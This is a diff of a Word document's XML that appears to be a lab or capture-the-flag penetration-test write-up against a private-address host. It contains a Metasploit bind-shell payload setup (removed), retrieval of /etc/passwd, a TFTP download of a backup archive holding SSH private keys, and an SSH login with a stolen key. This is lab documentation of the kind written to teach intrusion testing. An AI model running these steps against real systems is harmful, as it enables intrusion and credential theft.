+        <w:t>/etc/passwd</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6766,7 +6462,98 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>View payloads:</w:t>
+        <w:t>Successfully retrieved system user information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F4ED01" wp14:editId="7E87C33A">
+            <wp:extent cx="5731510" cy="2997200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="163497230" name="Picture 31"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="163497230" name="Picture 163497230"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2997200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Further exploitation revealed backup script:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6812,7 +6599,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>show payloads</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>/usr/local/scripts/backup.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6828,11 +6616,112 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Select payload:</w:t>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3249E9DF" wp14:editId="577D5737">
+            <wp:extent cx="5731510" cy="2997200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1340619451" name="Picture 32"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1340619451" name="Picture 1340619451"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2997200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>TFTP Exploitation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Connected to TFTP service:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6867,6 +6756,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6878,7 +6768,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>set payload cmd/unix/bind_perl</w:t>
+        <w:t>tftp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 172.20.10.2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>get backup.tar</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6893,14 +6811,33 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Extracted backup file locally.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28F7E693" wp14:editId="3D712470">
-            <wp:extent cx="5731510" cy="4232275"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A67D986" wp14:editId="42886A46">
+            <wp:extent cx="5731510" cy="2996565"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1294687377" name="Picture 1"/>
+            <wp:docPr id="1008298024" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6908,11 +6845,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1294687377" name=""/>
+                    <pic:cNvPr id="1008298024" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6920,7 +6857,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4232275"/>
+                      <a:ext cx="5731510" cy="2996565"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6972,7 +6909,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Running the Exploit</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Backup Analysis</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6992,7 +6930,256 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Command:</w:t>
+        <w:t>Extracted contents revealed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">• </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/home/paul/keys/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> directory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Multiple SSH private keys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1046737A" wp14:editId="53008F11">
+            <wp:extent cx="5731510" cy="2997200"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="521851205" name="Picture 33"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="521851205" name="Picture 521851205"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2997200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F06A121" wp14:editId="2409DAF3">
+            <wp:extent cx="5731510" cy="3149600"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="1256318717" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1256318717" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3149600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Initial Access (SSH)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Tried SSH with keys:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7038,7 +7225,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>exploit</w:t>
+        <w:t>ssh paul@172.20.10.2 -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> id_key4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7058,130 +7273,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The exploit successfully connected and opened a shell.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79298D9D" wp14:editId="20314717">
-            <wp:extent cx="5731510" cy="2611120"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="642281539" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="642281539" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2611120"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Gaining Initial Access</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
